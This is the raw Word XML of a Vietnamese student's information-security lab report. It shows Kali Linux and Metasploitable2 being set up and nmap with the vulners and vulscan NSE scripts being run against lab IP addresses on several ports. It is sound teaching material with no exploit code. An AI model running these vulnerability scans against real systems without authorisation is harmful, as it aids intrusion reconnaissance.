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CDD33" w14:textId="77777777" w:rsidR="00D54FCA" w:rsidRPr="000C7624" w:rsidRDefault="00D54FCA" w:rsidP="00D54FCA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Báo cáo thực hành môn Cơ sở </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> toàn thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9ECEDB" w14:textId="7F4D8722" w:rsidR="00D54FCA" w:rsidRPr="000C7624" w:rsidRDefault="00D54FCA" w:rsidP="00D54FCA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Bài thực hành số</w:t>
      </w:r>
      <w:r w:rsidR="00BB117E" w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072A5E3" w14:textId="77777777" w:rsidR="00D54FCA" w:rsidRPr="000C7624" w:rsidRDefault="00D54FCA" w:rsidP="00D54FCA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Họ và Tên: Nguyễn Quang Hà</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8516AB" w14:textId="7567224F" w:rsidR="007E464E" w:rsidRPr="000C7624" w:rsidRDefault="00D54FCA" w:rsidP="007E464E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Mã SV: B19DCAT053</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C34CD" w14:textId="53A258F0" w:rsidR="00F13849" w:rsidRPr="000C7624" w:rsidRDefault="00F13849" w:rsidP="007E464E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="163ADF6F" w14:textId="403E288E" w:rsidR="00F13849" w:rsidRPr="000C7624" w:rsidRDefault="00F13849" w:rsidP="00F13849">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nội dung thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C29A585"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5.1 Cài đặt các công cụ, nền tảng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFA42D"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Kali linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570A296A" w14:textId="0B0B375E" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4857C6B9" wp14:editId="0977149D">
            <wp:extent cx="5400334" cy="532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8575" cy="5342460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE3A3E5"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713609C"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xml:space="preserve">- Tải và cài đặt Metasploitable2 làm máy victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8934B" w14:textId="51E805F2" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B46FE76" wp14:editId="1EEDF619">
            <wp:extent cx="6120765" cy="3081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3081020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10277F10"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Kiểm tra kết nối mạng giữa các máy: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564241FB"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o Từ máy victim, chạy lệnh ping </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA2ABA" w14:textId="6A4EA871" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00202C3B" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202C3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66A0D934" wp14:editId="43B99E25">
            <wp:extent cx="5649113" cy="156231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9113" cy="1562318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2075F4AB"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o Từ máy Kali, chạy lệnh ping </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A93D28" w14:textId="73182AC6" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="002D6CBB" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D6CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7584294D" wp14:editId="6A3156AC">
            <wp:extent cx="5563376" cy="22101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2210108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9BFA67"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5.2 Kiểm tra và cài đặt các NSE scripts cho nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A14BA2" w14:textId="5F7A7076"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Kiểm tra các NSE scripts có sẵ</w:t>
      </w:r>
      <w:r w:rsidR="002D6CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n cho nmap:</w:t>
      </w:r>
      <w:r w:rsidR="002D6CBB" w:rsidRPr="002D6CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F0AC697" wp14:editId="63A59756">
            <wp:extent cx="6120765" cy="37668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766820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF5799"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Cài đặt CSDL nmap-vulners: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3068F1"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sudo git clone https://github.com/vulnersCom/nmap-vulners.git </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236AFA7" w14:textId="5D3DFD71" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="002D6CBB" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D6CBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E30BDA8" wp14:editId="1EE89533">
            <wp:extent cx="5953956" cy="1743318"/>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956" cy="1743318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD8C29"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ls nmap-vulners </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6C95A" w14:textId="5909E1C0" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00CC16C2" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC16C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B266534" wp14:editId="78CDD04C">
            <wp:extent cx="6120765" cy="6775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77545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11974DFA"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74971FD9"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xml:space="preserve">- Cài đặt CSDL vulscan: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ADB23A"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sudo git clone https://github.com/scipag/vulscan.git </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B5892" w14:textId="367C4D0D" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00CC16C2" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC16C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A4C20A" wp14:editId="20B4DD11">
            <wp:extent cx="5830114" cy="168616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114" cy="1686160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1E2C2"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ls vulscan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8500EC" w14:textId="081D4DF2" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="00CC16C2" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC16C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6743F149" wp14:editId="328DE4C4">
            <wp:extent cx="6120765" cy="6800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680085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12812C6A" w14:textId="77777777" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00918759"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5.3 Quét máy victim Metasploitable2 tìm các lỗ hổng tồn tại sử dụng NSE script với nmap Sử dụng công cụ nmap với NSE script để rà quét các lỗ hổng tồn tại trên máy chạy Metasploitable2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A021495" w14:textId="05632EB8"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nmap --script=vulscan/vulscan.nse -sV -p21 </w:t>
      </w:r>
      <w:r w:rsidR="00CC16C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDC7B42" w14:textId="51CCDF71" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="009A25B9" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA4E2E5" wp14:editId="6149C61E">
            <wp:extent cx="6120765" cy="2806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806065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61718431"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE93752" w14:textId="15CA20CD"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xml:space="preserve">nmap --script=vulscan/vulscan.nse -sV -p22 </w:t>
      </w:r>
      <w:r w:rsidR="009A25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.195</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFC37BB" w14:textId="36E0DEB2" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="009A25B9" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BCC14E6" wp14:editId="76E9F3AB">
            <wp:extent cx="6120765" cy="3778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778250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F2CCD6" w14:textId="11EBFAF3"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nmap --script=vulscan/vulscan.nse -sV -p23 </w:t>
      </w:r>
      <w:r w:rsidR="009A25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A907A9" w14:textId="106ED917" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="009A25B9" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078AF13F" wp14:editId="206DFA3C">
            <wp:extent cx="6120765" cy="37534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753485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="299790AC"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695EBC2" w14:textId="7030FF71"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xml:space="preserve">nmap --script=nmap-vulners/vulners.nse -sV -p21 </w:t>
      </w:r>
      <w:r w:rsidR="009A25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308230B8" w14:textId="452829AB" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="009A25B9" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A25B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30D35E4A" wp14:editId="2AB66B77">
            <wp:extent cx="6120765" cy="16605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660525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D93C203" w14:textId="20B8DB36" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6474"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script=nmap-vulners/vulners.nse -sV -p22 </w:t>
      </w:r>
      <w:r w:rsidR="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.129</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886A548" w14:textId="505C21AA" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="007279E3" w:rsidP="000C7624">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6474"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79844CD9" wp14:editId="7DFD9A28">
            <wp:extent cx="6120765" cy="288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82900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FC433" w14:textId="38ACFDBF" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nmap --script=nmap-vulners/vulners.nse -sV -p23 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096BAE9" w14:textId="7969C6F2" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="007279E3" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A022108" wp14:editId="4D1B8B14">
            <wp:extent cx="6120765" cy="16598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659890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D4314"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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33532637" w14:textId="22ECDBA9"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xml:space="preserve">nmap --script=vulscan/vulscan.nse -sV -p80 </w:t>
      </w:r>
      <w:r w:rsidR="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDDE8E" w14:textId="34A29215" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="007279E3" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BCB0EDD" wp14:editId="4A22E43C">
            <wp:extent cx="6120765" cy="2543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543175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7FA782" w14:textId="125077C5"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nmap --script=vulscan/vulscan.nse -sV -p139 </w:t>
      </w:r>
      <w:r w:rsidR="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>192.168.203.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49E95E" w14:textId="36E4CAFA" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="007279E3" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007279E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024BB3F0" wp14:editId="6AC3EF3D">
            <wp:extent cx="6120765" cy="2765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2765425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3152D25A" w14:textId="3BFA4BE4" w:rsidR="000C7624" w:rsidRPr="000C7624" w:rsidRDefault="000C7624" w:rsidP="000C7624">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nmap --script=vulscan/vulscan.nse -sV -p5432 92.168.</w:t>
      </w:r>
      <w:r w:rsidR="007279E3">
        <w:rPr>
